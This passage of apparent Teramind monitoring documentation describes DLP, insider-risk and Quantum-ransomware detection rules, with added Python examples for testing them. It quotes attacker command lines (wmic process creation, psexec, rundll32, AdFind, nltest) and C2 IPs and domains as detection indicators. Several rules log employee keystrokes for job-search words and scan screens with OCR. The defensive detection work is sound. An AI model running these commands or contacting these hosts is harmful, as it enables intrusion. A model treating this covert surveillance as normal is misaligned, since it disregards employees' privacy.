This rule detects the launch of known remote access binaries: rms.exe, teamviewer.exe, and anydesk.exe. The Warn action fires immediately upon process launch to alert the security team (MITRE ATT&CK ID: T1219).
Unauthorized Data Access: Key Client Data
Specific high-value documents, such as client data spreadsheets, may need enhanced monitoring regardless of the user accessing them. URL-based monitoring provides precise protection at the document level.
This rule monitors for visits to two specific Google Sheets URLs containing key client data. When either URL is loaded in a browser, the Warn action fires with a reminder that the content is sensitive and should not be copied.
TBG005 OCR Capture of Credit Cards
Credit card numbers displayed in business applications can be captured visually without triggering any file or clipboard event. OCR-based detection provides a last line of defense against screen-based financial data theft.
This rule uses OCR to scan the visible screen for patterns matching Mastercard, Visa, American Express, and Discover card number formats using regex. When a credit card number is detected on screen, a Notify action alerts the designated administrator for immediate follow-up.
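To see how brand-format patterns behave on OCR text, here is an added Python example that is not Teramind's code or rule export. It matches Visa, Mastercard, American Express and Discover formats with optional spaces or dashes between groups and then applies a Luhn checksum. Treating the Loose mode of the clipboard and DLP credit-card rules on this page as a format-only match and the Strict mode as format plus Luhn is an assumption about the classifier, made here only to show why the two modes report different results; the OCR text is constructed and the card numbers are the public industry test numbers plus one Luhn-invalid typo.

```python
import re

# Brand formats used by the OCR rule, with an optional space or dash between
# groups so OCR output such as "4111 1111 1111 1111" still matches. The
# Mastercard 2221-2720 range is simplified to 22xx-27xx for brevity.
SEP = r"[ -]?"
CARD_PATTERNS = {
    "visa":       r"4\d{3}" + SEP + r"\d{4}" + SEP + r"\d{4}" + SEP + r"\d{4}",
    "mastercard": r"(?:5[1-5]\d{2}|2[2-7]\d{2})" + SEP + r"\d{4}" + SEP + r"\d{4}" + SEP + r"\d{4}",
    "amex":       r"3[47]\d{2}" + SEP + r"\d{6}" + SEP + r"\d{5}",
    "discover":   r"6011" + SEP + r"\d{4}" + SEP + r"\d{4}" + SEP + r"\d{4}",
}

# One alternation with a named group per brand, fenced by digit lookarounds so
# a 16-digit run inside a longer number (invoice IDs, tracking numbers) is not
# reported as a card.
CARD_RE = re.compile(
    r"(?<!\d)(?:" + "|".join(f"(?P<{b}>{p})" for b, p in CARD_PATTERNS.items()) + r")(?!\d)"
)


def luhn_ok(digits: str) -> bool:
    """Standard Luhn checksum: double every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_cards(text: str, mode: str = "strict"):
    """Return (brand, digits) for every card-like number in text.

    mode="loose"  -> format match only (assumed to model the Loose mode)
    mode="strict" -> format match plus Luhn checksum (assumed Strict mode)
    """
    hits = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if mode == "strict" and not luhn_ok(digits):
            continue
        hits.append((m.lastgroup, digits))
    return hits


# Constructed sample resembling OCR output from a CRM screen.
SAMPLE_OCR_TEXT = """\
Customer: A. Example   Card on file: 4111 1111 1111 1111  exp 09/27
Backup card 5500-0000-0000-0004 (MC)   Amex 3782 822463 10005
Gift card 6011 1111 1111 1117
Typo'd entry: 4111 1111 1111 1112   Invoice no. 20230415123456789
"""

if __name__ == "__main__":
    for mode in ("loose", "strict"):
        print(mode, find_cards(SAMPLE_OCR_TEXT, mode))
```

On the sample, the loose pass reports five numbers and the strict pass four: the typo'd Visa number has a valid format but fails Luhn, while the 17-digit invoice number is never reported because of the digit lookarounds. A Notify rule fed by OCR is noisy by nature, so the checksum is the cheapest filter to add before paging an administrator.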
Clearing Browsing History in Internet Explorer
Much like Chrome history clearing, removing Internet Explorer/Edge browsing history can be an attempt to erase evidence of unauthorized web activity. IE-specific detection ensures coverage of legacy browsers still present in many enterprise environments.
This rule detects IE history clearing through the "Delete Browsing History" dialog in iexplore.exe or via the command-line RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess invocation. The Warn action fires to log the event.
Running VPN, Proxy or Tunneling Tools
Unauthorized VPN or tunneling tools can be used to bypass corporate web filters, obscure network traffic, or establish covert communication channels, representing a direct risk to network visibility and data loss prevention controls.
This rule detects the launch of openvpn or wireguard processes by application name. The Warn action fires immediately to alert the security team that an unapproved tunneling tool is in use.
Exporting Windows Registry Data
Exporting registry hives creates portable copies of system configurations that can be analyzed offline, shared externally, or used to reconstruct environments without authorization. This activity should always be logged.
This rule fires when reg export is executed from the command line or when the "Export Registry File" dialog is opened in regedit.exe or Explorer. The Warn action fires to create an audit record.
Printing Sensitive Documents
Documents with sensitive classification labels in their filename represent content that may be subject to special handling requirements. Printing them without authorization creates uncontrolled physical copies.
This rule monitors print jobs where the document name contains "sensitive doc" or "confidential". The Warn action fires upon detection. (Update the document name filters to match your organization's naming conventions.)
Agent Removal Tool
Downloading or executing the Teramind agent removal tool is an unambiguous indicator that a user is attempting to disable monitoring, a serious policy violation requiring immediate intervention.
This rule fires when a file download from a URL containing "teramind-remover" is detected, when a file is renamed to contain "teramind-remover", or when an application with that name is launched. The Block action immediately prevents the operation from completing.
Checking Code with AI
Sharing proprietary source code with public AI tools, even for benign purposes like debugging, may expose intellectual property or reveal architectural details to third-party systems without organizational consent.
This rule triggers once per day when the keyword "code" is typed in keystrokes while the active browser tab is on chatgpt.com. The Notify action sends an alert to the configured administrator, providing visibility into code sharing behavior with AI tools.
T1562.004 Impair Defenses: Disable or Modify System Firewall
Modifying or disabling the Windows Firewall removes a critical network defense layer and is a common technique used by attackers to enable C2 communication or prevent security tool updates.
This rule detects firewall modifications via multiple methods: command-line operations using netsh advfirewall commands (set, add rule, delete rule), New-NetFirewallRule, Remove-NetFirewallRule, and related PowerShell cmdlets. It also detects UI access to the Windows Defender Firewall control panel. The Warn action fires on detection (MITRE ATT&CK ID: T1562.004).
Sending Email with Sensitive Keywords in Subject
Outbound emails whose subject lines contain classification terms like "sensitive", "confidential", or "classified", sent to external recipients, represent a potential data disclosure risk that should be reviewed.
This rule fires when an outgoing email's subject contains those terms and the recipient domain is not @mycompany.com. The Warn action fires to surface the event. (Update the domain exclusion to match your organization.)
TBG004 PII Exfiltration
Personally identifiable information, including Social Security Numbers, phone numbers, and email addresses, sent via email to external parties represents a potential HIPAA, GDPR, or CCPA violation.
This rule uses the Personal Content classifier to detect SSN, phone number, or email address data in outgoing emails sent to addresses outside @teramind.co, or in outgoing emails with attachments. The Notify action alerts the designated administrator when any of these PII types are detected in an outbound email context.
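An added Python example, not Teramind's code, that applies the two outbound-email rules above, plus the attachment-type check used later by the Sample Policy's Email Attachment Monitoring rule, to constructed outgoing messages. The internal domain mycompany.com, the simplified PII regexes standing in for the Personal Content classifier, and the message contents are assumptions. The point to take from it is that the external-recipient test must compare the whole domain: a suffix test would also accept look-alike domains such as notmycompany.com.

```python
import re
from dataclasses import dataclass, field

INTERNAL_DOMAINS = {"mycompany.com"}        # assumption: your own mail domains
SUBJECT_TERMS = ("sensitive", "confidential", "classified")
ATTACHMENT_EXTS = (".pdf", ".bat", ".zip", ".docx")

# Simplified PII patterns standing in for the Personal Content classifier.
PII_PATTERNS = {
    "ssn":   re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "phone": re.compile(r"\b\(?\d{3}\)?[ .-]?\d{3}[ .-]\d{4}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b"),
}


@dataclass
class OutgoingMail:
    recipients: list
    subject: str
    body: str
    attachments: list = field(default_factory=list)


def is_external(addr: str) -> bool:
    """Exact domain comparison. A suffix test such as
    addr.endswith("mycompany.com") would wrongly treat
    bob@notmycompany.com as internal."""
    domain = addr.rsplit("@", 1)[-1].lower()
    return domain not in INTERNAL_DOMAINS


def evaluate(mail: OutgoingMail) -> list:
    findings = []
    external = [r for r in mail.recipients if is_external(r)]

    # Sending Email with Sensitive Keywords in Subject (external recipients only)
    if external and any(t in mail.subject.lower() for t in SUBJECT_TERMS):
        findings.append("sensitive-subject-external")

    # TBG004 PII Exfiltration: PII in the body, sent externally or with attachments
    pii = sorted(n for n, rx in PII_PATTERNS.items() if rx.search(mail.body))
    if pii and (external or mail.attachments):
        findings.append("pii-exfiltration:" + ",".join(pii))

    # Email Attachment Monitoring: the extension test is case-insensitive
    for name in mail.attachments:
        if name.lower().endswith(ATTACHMENT_EXTS):
            findings.append("attachment:" + name)
    return findings


# Constructed test messages.
SAMPLES = [
    OutgoingMail(["partner@example.org"], "Confidential: Q3 plan", "See attached.", ["plan.PDF"]),
    OutgoingMail(["alice@mycompany.com"], "Confidential notes", "Candidate SSN 123-45-6789", []),
    OutgoingMail(["bob@notmycompany.com"], "hi", "Call me on 555-123-4567", []),
    OutgoingMail(["hr@mycompany.com"], "roster", "Employee SSN 987-65-4321", ["roster.xlsx"]),
]

if __name__ == "__main__":
    for m in SAMPLES:
        print(m.recipients, evaluate(m))
```

The second message carries an SSN but stays silent because it is internal and has no attachment, while the fourth fires on the attachment condition even though the recipient is internal, exactly the two branches the TBG004 rule describes. Expect the email-address pattern to fire on signatures and quoted threads; that is where tuning of the real classifier usually starts.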
TBG001 Keystrokes for Job Searches
Employees actively searching for new employment are a flight risk and may attempt to exfiltrate data before departure. Detecting job-seeking keywords in keystrokes provides early warning for HR and security teams.
This rule monitors keystrokes for job-seeking terms, including "new job", "recruiter", "full time", "career", "job hunt", and "salary", and aggregates detections daily. The Notify action sends a report to the configured administrator.
Login Outside of Working Hours (second instance)
This is an additional copy of the after-hours login rule with different recipients. It triggers on fresh logins (screen unlocks excluded) between midnight and 10:00 AM or between 6:00 PM and midnight, and sends notifications to a primary and a secondary email address.
Logging in Remotely (RDP) to Sensitive Windows Server from Unauthorized Client
RDP connections to sensitive servers from applications other than the authorized mstsc.exe client may indicate that an attacker or unauthorized tool is establishing a remote session.
This rule monitors network connections to specific sensitive server IPs (e.g., 192.168.1.1 or 172.16.1.1) on port 3389 (RDP) where the connecting application is not mstsc.exe. The Warn action fires to alert the security team of the unauthorized RDP connection attempt. Other legitimate clients, such as the newer Windows Remote Desktop client (msrdc.exe) or third-party connection managers, will also trigger it, so extend the allowed-application list to match what your administrators actually use.
Configuring Windows VPN Connection
VPN configuration changes can create unauthorized network tunnels, bypass content filtering, or expose internal resources. All such changes should be logged and reviewed.
This rule detects VPN configuration via the Control Panel Network Connections dialog, the "Connect to a Workplace" wizard, or command-line tools like rasphone, rasdial, Add-VpnConnection, and Set-VpnConnection. The Warn action fires to create an audit record.
Connecting Unlisted USB Device
Any file system interaction with an external drive that hasn't been explicitly authorized represents a potential data exfiltration or malware introduction vector.
This rule fires on any file operation (Any) targeting %EXTERNALDRIVES%. The Warn action fires to notify the user and create an audit record of the USB connection and file activity.
Configuring Windows LAN or Proxy Settings
Proxy and LAN settings control how a machine routes its traffic. Unauthorized changes can redirect traffic through attacker-controlled infrastructure, bypass DLP controls, or enable man-in-the-middle attacks.
This rule detects proxy configuration changes through: the Control Panel Network Connections page, the rundll32.exe Internet Properties or LAN Settings dialogs, and command-line operations using netsh winhttp set proxy, set HTTP_PROXY=, set HTTPS_PROXY=, and related registry commands. The Warn action fires on detection.
Interacting with Remote Machines Using PowerShell Commands
Enter-PSSession and Invoke-Command are the primary PowerShell remoting cmdlets. Their use is a significant event that may indicate lateral movement, remote configuration changes, or unauthorized administration.
This rule detects command-line execution of Enter-PSSession or Invoke-Command. The Warn action fires to create an audit record of the remote PowerShell activity. Note that Invoke-Command without -ComputerName or -Session runs the script block locally and is common in scripts, so expect some noise until you tune the criterion toward the remoting parameters.
3. Insider Risk
This policy focuses on identifying behavioral patterns and technical actions that are typical of insider threat scenarios, covering both malicious insiders and negligent employees. Rules range from direct data exfiltration attempts to behavioral signals like accessing streaming sites during work hours.
Prevent RDP File Transfers
RDP clipboard-based file transfers are frequently overlooked but represent a simple, effective mechanism for moving files between a remote and local session without triggering standard file transfer alerts.
This rule fires when a Copy operation is detected that is flagged as an RDP transfer (rdpTransfer = true). The Block action immediately prevents the file transfer from completing.
In Office Attendance
Verifying whether employees are physically present in the office can be accomplished by checking whether their endpoint has a known internal IP address assigned to the office network.
This rule uses a Network criterion to check whether the user's local IP address matches the office network (the export uses 1.1.1.1/32 as a placeholder; replace it with your office range). When the IP matches, it confirms office presence. The Lock User action (with zero severity) can be adapted to trigger other workflows or reports.
Sensitive Projects Leak
Projects under a code name may contain information so sensitive that any visible reference on screen, even in a meeting or document, warrants immediate notification to security leadership.
This rule uses OCR to monitor all on-screen content for the exact phrase "Project Icarus" (replace with your actual project code name). Upon detection, a Notify action with maximum severity (100) alerts the designated administrator immediately.
Block Malicious Application
Certain applications may be prohibited on corporate endpoints due to security vulnerabilities, compliance requirements, or license restrictions. This rule enforces a hard block on Java applications outside of approved exceptions.
This rule blocks any process matching java.exe unless the title contains "Java" or the application is an approved exception (zoom.exe or soffice.bin). The Block action fires immediately with a message informing the user that Java applications are not permitted.
Accessing Streaming Sites
Streaming video sites consume significant bandwidth and represent unproductive use of work time. This rule provides both a user-facing warning and a manager notification when corporate devices are used to access them.
This rule monitors webpage visits to a broad list of streaming platforms including Netflix, Disney+, Hulu, HBO Max, Amazon Prime Video, Crunchyroll, Dailymotion, and others. When any of these sites is loaded (as a full Webpage request), the Warn action shows the user a message and the Notify action alerts the assigned manager.
Greater Than 10MB Download from Google Drive
Large downloads from Google Drive, particularly from shared corporate drives, may represent bulk data collection by an insider preparing to leave or exfiltrate company assets.
This rule fires when a file download is detected from drive.google.com, drive.usercontent.google.com, or drive-data-export.usercontent.google.com. The Notify action alerts the administrator when this occurs. The rule has a high severity rating (75) to reflect the elevated risk. After import, confirm that the 10 MB file-size threshold named in the rule title is present in the criteria.
Running TOR Browser
TOR browser usage on corporate devices is a serious risk indicator and almost always violates acceptable use policies. The anonymization features make it a preferred tool for employees attempting to bypass monitoring.
This rule detects a process named tor.exe (excluding monitor.exe and firefox.exe, which the Tor Browser bundle also launches), and also catches the "Connect to Tor" dialog title. The Warn action displays an HTML message to the user informing them that TOR Browser is prohibited.
DLP: Credit Card Number
This comprehensive DLP rule covers all major vectors through which credit card data could leave the organization: file operations, outgoing email attachments, clipboard use, and instant messages.
This rule uses the Financial Content (Credit Card Number) classifier in Strict mode and fires when credit card data is detected in any of these activities: file Copy or Upload operations, outgoing email attachments sent to external addresses (not teramind.co), clipboard operations in Excel or Notepad, or outgoing instant messages. The Notify action alerts the assigned security contact with maximum severity (100).
Rename Downloaded File
Renaming downloaded files can be a technique for obfuscating the identity of malicious files or evading filename-based DLP rules. Monitoring renames in download directories provides early warning.
This rule fires when a Rename operation is detected on files within downloads\client paths. The Notify action alerts the administrator with high severity (75).
Login Hours
Enforcing strict login windows ensures that corporate systems are only accessed during authorized periods. This rule goes beyond detection: it actively blocks logins that occur outside permitted hours.
This rule fires when a user logs in, or unlocks the screen (screenUnlock = true), outside the permitted window (5:40 AM to 7:20 PM in the configured example). The Block action prevents the session from continuing with a message that login is not allowed during off-hours.
File Rule Example
This example rule demonstrates Teramind's full content inspection capabilities for file operations, combining text content, binary content, file origin, file properties, and financial data detection in a single rule.
This rule fires when a file involved in a Write, Access, Delete, Copy, or Upload operation contains any of: specific sensitive text, file metadata from a designated network origin, custom file properties, or credit card numbers (Loose mode). The Block action prevents the operation, a Notify action alerts the assigned contact, and a 10-minute pre/post screen recording is captured for forensic review.
Accessing Sensitive Folder
Certain directories contain classified or restricted files that should only be accessed by authorized personnel. This rule monitors a specific sensitive folder and alerts on any access or modification.
This rule fires when Access or Write operations are detected on files within the designated sensitive folder (C:\path\to\sensitive folder), or when files are Copied from that folder. Update the path to match your organization's sensitive directory. The Warn action fires with a message to the user.
Workplace Toxicity
Toxic workplace communications, including threats, intimidation, and statements about leaking company information to competitors, are HR and security risks that warrant immediate escalation.
This rule monitors keystrokes for specific phrases indicative of workplace toxicity, including "throat punch", "make sure he pays for this", "go to the competition with everything", and "going to explode". The Notify action with high severity (75) alerts the administrator immediately.
Downloading Unrelated Apps
Downloading applications like TOR or privacy-focused browsers directly to corporate machines represents a deliberate attempt to install unauthorized or monitoring-evasion tools.
This rule fires when a file download is detected where the filename contains "tor" or "brave". The Block action prevents the download from completing and displays an HTML message to the user.
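Because the rule matches "tor" and "brave" as substrings, a Block on it also stops downloads such as editor-setup.msi or storage-report.pdf. The added Python example below, which is not Teramind's code, compares that substring test with a token test that requires the term to stand alone in the name (a CamelCase boundary counts, so BraveBrowserSetup.exe still matches). The Agent Removal Tool rule's term is included in the same list; the file names are constructed.

```python
import re

TERMS = ("tor", "brave", "teramind-remover")

# Token pattern: the term may not be preceded by a letter or digit, and may not
# be followed by a lowercase letter or digit. An uppercase letter after the term
# is allowed so CamelCase names such as BraveBrowserSetup.exe still match.
TOKEN_RE = re.compile(
    r"(?<![A-Za-z0-9])(?i:" + "|".join(re.escape(t) for t in TERMS) + r")(?![a-z0-9])"
)


def substring_hit(name: str) -> bool:
    """The demo rule's behaviour: plain case-insensitive substring."""
    lowered = name.lower()
    return any(t in lowered for t in TERMS)


def token_hit(name: str) -> bool:
    return TOKEN_RE.search(name) is not None


def flagged(names, matcher):
    return [n for n in names if matcher(n)]


# Constructed download names: three real targets, three look-alikes.
SAMPLE_NAMES = [
    "tor-browser-windows-x86_64-portable-13.0.exe",
    "BraveBrowserSetup.exe",
    "teramind-remover.exe",
    "editor-setup-1.2.msi",      # contains "tor"
    "storage-report.pdf",        # contains "tor"
    "history.zip",               # contains "tor"
]

if __name__ == "__main__":
    print("substring:", flagged(SAMPLE_NAMES, substring_hit))
    print("token:    ", flagged(SAMPLE_NAMES, token_hit))
```

The substring matcher flags all six names; the token matcher flags only the first three. Renamed installers (Agent Removal Tool's rename criterion exists for exactly that reason) will evade either test, so treat this as a noise-reduction step, not a stronger control.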
Emailing PHI to External Email
Protected Health Information (PHI), including drug names and medical terminology, is subject to strict HIPAA requirements. Any outbound email containing PHI must be caught before it leaves the organization.
This rule uses the Health Content (Drug) classifier to detect drug-related terminology in outgoing emails with attachments sent externally. The Block action immediately prevents the email from being sent, ensuring PHI does not leave without authorization.
Unusual Access: Marketing Share Drive
Specific high-value shared drives may need targeted monitoring to detect unauthorized access. For example, a product or finance employee browsing the marketing team's files would trigger this rule.
This rule fires when a specific Google Drive folder URL is accessed. The Notify action alerts the designated data owner (in this case, AJ Davidson) so they can review the access in context.
4. Quantum Ransomware
This policy provides a detection framework specifically tuned to the tactics, techniques, and procedures (TTPs) observed in the Quantum ransomware attack chain, as documented in threat intelligence reports. It maps directly to MITRE ATT&CK techniques and is designed to detect the attack at multiple stages.
T1071.001: Web Protocols: Cobalt Strike C2
The Quantum ransomware attack chain includes a Cobalt Strike beacon for command-and-control. Detecting network connections to the known C2 IP provides the earliest possible warning of active compromise.
This rule fires when any network connection is detected to the known Cobalt Strike C2 IP address 185.203.118.227. The Warn action triggers immediately to alert the security team that a beacon is already active (MITRE ATT&CK ID: T1071.001).
Quantum Ransomware Initial Access
The Quantum ransomware initial access vector involves a malicious ISO file disguised as an invoice. Detecting access to this specific filename provides an early-stage tripwire.
This rule fires when a File Access operation is detected on a file matching the known Quantum dropper filename docs_invoice_173.iso. The Warn action fires immediately to alert the security team.
T1518.001 Software Discovery: Security Software Discovery
Before deploying ransomware, threat actors often enumerate installed security software to determine what defenses they need to evade. The Quantum chain uses WMI to query the Security Center.
This rule fires when the specific WMI command WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List is executed from the command line. The Warn action fires immediately.
T1049 System Network Connections Discovery
Network connection enumeration is used to identify accessible hosts, shares, and services that can be leveraged for lateral movement in the next phase of the attack.
This rule detects the net config workstation command executed from the command line, which reveals the computer name, logon domain, and network configuration of the workstation. The Warn action fires upon detection.
T1218.011 System Binary Proxy Execution: Rundll32
Quantum ransomware uses rundll32.exe to execute a malicious DLL (dar.dll) as part of its execution chain, leveraging a trusted Windows binary to bypass application whitelisting.
This rule fires when rundll32.exe dar.dll,DllRegisterServer is detected in command-line arguments. The Warn action fires immediately to alert the security team.
T1018 Remote System Discovery
Quantum actors use AdFind.exe and net view commands to enumerate the domain, discovering all computers, users, organizational units, and trust relationships to plan their lateral movement.
This rule fires when any of the following are detected in command-line arguments: net view /all /domain, adfind.exe, adfind.bat, or AdFind object category filters (-f (objectcategory=person), -fobjectcategory=computer, etc.). The Warn action fires on detection.
T1569.002 System Services: Service Execution
Quantum uses PsExec to execute remote commands and stage files across the environment. Detecting PsExec usage is a critical indicator of the lateral spread phase.
This rule fires when command-line arguments contain psexec.exe or the specific Quantum service execution command (-s -d -h -r mstdc -accepteula -nobanner c:\windows\temp\ttsel.exe). The Warn action fires immediately.
T1204.001 User Execution: Malicious Link
The Quantum attack chain uses a .lnk shortcut file (document.lnk) to execute malicious code when the user opens what appears to be a document. Detecting file activity on this specific filename is a high-confidence indicator. (ATT&CK's T1204.001 covers clicked URLs; a shortcut file that executes code is more precisely T1204.002 User Execution: Malicious File, so adjust the mapping if you report on technique coverage.)
This rule fires on any file operation (Access, Rename, Write, Delete, folder operations, Copy) involving a file matching document.lnk. The Warn action fires to alert the security team.
T1482 Domain Trust Discovery
Discovering domain trust relationships allows attackers to identify paths for lateral movement and privilege escalation across multiple domains. Quantum uses nltest for this purpose.
This rule fires when nltest /domain_trusts or nltest /domain_trusts /all_trusts is detected in command-line arguments. The Warn action fires immediately.
T1071.001: Web Protocols: IcedID C2
Quantum ransomware uses the IcedID banking trojan as an initial access broker. Detecting connections to known IcedID C2 domains provides critical early warning of compromise.
This rule fires when network connections are made to known IcedID C2 domains including dilimoretast.com, antnosience.com, oceriesfornot.top, or any IP in the associated quantumIP Shared List. The Warn action fires to alert the security team.
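As an added Python example that is not Teramind's code, here are this page's network-criterion rules evaluated over constructed connection events: the Cobalt Strike and IcedID C2 indicators, the RDP-from-unauthorized-client rule, and the In Office Attendance check. The office range 10.20.0.0/16 and the extra authorized RDP client msrdc.exe are assumptions; the quantumIP Shared List is represented by the one IP the page gives.

```python
import ipaddress
from dataclasses import dataclass

# Indicators taken from the demo rules; the quantumIP Shared List is
# represented here by the single IP the page gives.
C2_IPS = {ipaddress.ip_address("185.203.118.227")}
C2_DOMAINS = {"dilimoretast.com", "antnosience.com", "oceriesfornot.top"}
SENSITIVE_RDP_HOSTS = {ipaddress.ip_address("192.168.1.1"), ipaddress.ip_address("172.16.1.1")}
RDP_PORT = 3389
# Assumption: the demo rule allows only mstsc.exe; msrdc.exe (the newer
# Windows Remote Desktop client) is added so it is not reported as rogue.
AUTHORIZED_RDP_CLIENTS = {"mstsc.exe", "msrdc.exe"}
# Assumption replacing the page's 1.1.1.1/32 placeholder.
OFFICE_NET = ipaddress.ip_network("10.20.0.0/16")


@dataclass
class Connection:
    process: str
    dst_ip: str
    dst_port: int
    local_ip: str
    dst_host: str = ""   # SNI / DNS name when known


def domain_listed(host: str) -> bool:
    """Exact match or a subdomain of a listed C2 domain; a bare suffix test
    would also match look-alikes such as antnosience.com.example.net."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def evaluate(c: Connection) -> list:
    findings = []
    dst = ipaddress.ip_address(c.dst_ip)
    if dst in C2_IPS:
        findings.append("T1071.001:cobalt-strike-c2")
    if c.dst_host and domain_listed(c.dst_host):
        findings.append("T1071.001:icedid-c2")
    if (dst in SENSITIVE_RDP_HOSTS and c.dst_port == RDP_PORT
            and c.process.lower() not in AUTHORIZED_RDP_CLIENTS):
        findings.append("rdp-unauthorized-client:" + c.process)
    if ipaddress.ip_address(c.local_ip) in OFFICE_NET:
        findings.append("in-office")
    return findings


# Constructed events.
SAMPLES = [
    Connection("rundll32.exe", "185.203.118.227", 443, "10.20.5.7"),
    Connection("chrome.exe", "203.0.113.10", 443, "192.168.50.3", dst_host="cdn.dilimoretast.com"),
    Connection("mstsc.exe", "192.168.1.1", 3389, "10.20.5.7"),
    Connection("python.exe", "172.16.1.1", 3389, "192.168.50.3"),
    Connection("chrome.exe", "203.0.113.10", 443, "192.168.50.3", dst_host="antnosience.com.example.net"),
]

if __name__ == "__main__":
    for c in SAMPLES:
        print(c.process, c.dst_ip, evaluate(c))
```

Static C2 indicators age quickly; the IPs and domains above are the ones this policy ships with and should be treated as a starting Shared List, not a maintained feed.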
T1087.002 Account Discovery: Domain Account
Enumerating domain group membership helps attackers identify high-value targets, such as domain administrators and privileged users, to prioritize for credential theft.
This rule fires when a command-line argument matches the regex net.*group.*domain, which covers every variant of the net group /domain command used for domain account discovery. Because the pattern is unanchored, it also matches unrelated command lines that happen to contain those three substrings in order. The Warn action fires on detection.
T1047 Windows Management Instrumentation: Impact
In the impact phase, Quantum uses WMI to execute its ransomware payload (ttsel.exe) on remote machines via cmd.exe.
This rule fires when wmic or the specific command process call create "cmd.exe /c c:\windows\temp\ttsel.exe" is detected from the command line. The Warn action fires immediately.
T1059 Command and Scripting Interpreter: Impact
Quantum uses cmd.exe to copy its ransomware binary to the Windows temp directory on remote machines as part of the deployment phase.
This rule fires when command-line arguments contain C:\Windows\system32\cmd.exe /K copy ttsel.exe or c$\windows\temp\. The Warn action fires to surface this critical stage of the attack chain.
T1047 Windows Management Instrumentation: Lateral Movement
WMI's remote node capability is used by Quantum to execute commands on remote machines, a key lateral movement mechanism that doesn't require opening new network ports.
This rule fires when a command-line argument matches the regex wmic.*node, detecting any WMI invocation that names a node, including local queries such as /node:localhost. The Warn action fires immediately.
T1053.005 Scheduled Task/Job: Quantum Persistence
Quantum installs a scheduled task with a specific GUID and DLL name to ensure it persists across reboots, enabling the ransomware to re-execute even if the initial payload is removed.
This rule fires when command-line arguments contain the Quantum-specific task name (kajeavmeva_{B8C1A6A8-541E-8280-8C9A-74DF5295B61A}) or the associated DLL arguments (Ulfefi32.dll",DllMain --alyege="SketchRare\license.dat"). The Warn action fires immediately.
T1082 System Information Discovery
System information enumeration (systeminfo) is performed by Quantum early in the attack chain to determine the target environment, operating system version, and installed patches before selecting the appropriate exploit or payload.
This rule fires when cmd.exe /c chcp >&2, systeminfo, or systeminfo.exe are detected in command-line arguments. The Warn action fires on detection.
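The command-line rules in this policy, together with the T1059.003 rule earlier on this page (cmd /c and .exe/.bat arguments, excluding //c in URLs), all reduce to pattern matching over process arguments. The added Python example below is not Teramind's code or a rule export: it renders the page's indicators as regexes, keeps the two patterns the page states as regexes (net.*group.*domain and wmic.*node) verbatim, and runs them over constructed command lines. The other regexes are my own renderings of the indicators quoted above, and the sample lines include a benign dotnet build and the localhost WMI query to show that the two verbatim regexes are broad enough to match them.

```python
import re


def _r(pattern: str):
    return re.compile(pattern, re.IGNORECASE)


# (technique label, scope, pattern). "args" rules look only at the arguments
# after the program name, as the T1059.003 rule does; "line" rules see the
# whole command line.
RULES = [
    ("T1059.003",     "args", _r(r"(?<!/)/c\b|\.(?:exe|bat)\b")),          # /c, excluding //c in URLs
    ("T1518.001",     "line", _r(r"namespace:\\\\root\\securitycenter2\s+path\s+antivirusproduct")),
    ("T1049",         "line", _r(r"\bnet\s+config\s+workstation\b")),
    ("T1218.011",     "line", _r(r"\brundll32(?:\.exe)?\s.*\bdar\.dll,dllregisterserver\b")),
    ("T1018",         "line", _r(r"\bnet\s+view\s+/all\s+/domain\b|\badfind\.(?:exe|bat)\b|-f\s*\(?objectcategory=")),
    ("T1569.002",     "line", _r(r"\bpsexec(?:\.exe)?\b")),
    ("T1482",         "line", _r(r"\bnltest\s+/domain_trusts\b")),
    ("T1087.002",     "line", _r(r"net.*group.*domain")),                   # page's regex, verbatim
    ("T1047/impact",  "line", _r(r"process\s+call\s+create\s+.*ttsel\.exe")),
    ("T1059/impact",  "line", _r(r"cmd\.exe\s+/k\s+copy\s+ttsel\.exe|c\$\\windows\\temp\\")),
    ("T1047/lateral", "line", _r(r"wmic.*node")),                           # page's regex, verbatim
    ("T1053.005",     "line", _r(r"kajeavmeva_\{B8C1A6A8-541E-8280-8C9A-74DF5295B61A\}|ulfefi32\.dll")),
    ("T1082",         "line", _r(r"\bsysteminfo(?:\.exe)?\b|chcp\s*>&2")),
]


def evaluate(cmdline: str) -> list:
    """Return the labels of every rule that matches one command line."""
    prog, _, args = cmdline.strip().partition(" ")
    hits = []
    for label, scope, rx in RULES:
        if rx.search(args if scope == "args" else cmdline):
            hits.append(label)
    return hits


# Constructed command lines: indicators from the policy plus two benign lines.
SAMPLES = [
    r"cmd.exe /c whoami",
    r"chrome.exe https://c.example.com/login",
    r"WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List",
    r"net config workstation",
    r"rundll32.exe dar.dll,DllRegisterServer",
    r"net view /all /domain",
    r"psexec.exe -s -d -h -r mstdc -accepteula -nobanner c:\windows\temp\ttsel.exe",
    r"nltest /domain_trusts /all_trusts",
    r"dotnet build MyGroup.Domain.csproj",
    r'wmic /node:10.0.0.12 process call create "cmd.exe /c c:\windows\temp\ttsel.exe"',
    "C:\\Windows\\system32\\cmd.exe /K copy ttsel.exe \\\\10.0.0.12\\c$\\windows\\temp\\",
    r'rundll32.exe Ulfefi32.dll,DllMain --alyege="SketchRare\license.dat"',
    r"systeminfo",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{evaluate(line)!s:45} {line}")
```

Two results are worth noting before importing these rules unchanged: the benign dotnet build trips T1087.002 because net.*group.*domain is unanchored, and the localhost antivirus query trips T1047/lateral as well as T1518.001 because wmic.*node does not distinguish local from remote nodes. Anchoring on `\bnet\s+group\b` and excluding `/node:localhost` are the usual first tuning steps.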
5. Sample Policy
This policy provides a curated set of example rules covering the most common and universally applicable monitoring scenarios. It serves as a starting point for new Teramind deployments and can be customized to match specific organizational needs.
Anonymous Browser Usage
Anonymous browsers like TOR allow users to browse the web without leaving identifiable traces. Their use on corporate devices almost always violates acceptable use policies and may indicate an employee attempting to bypass monitoring.
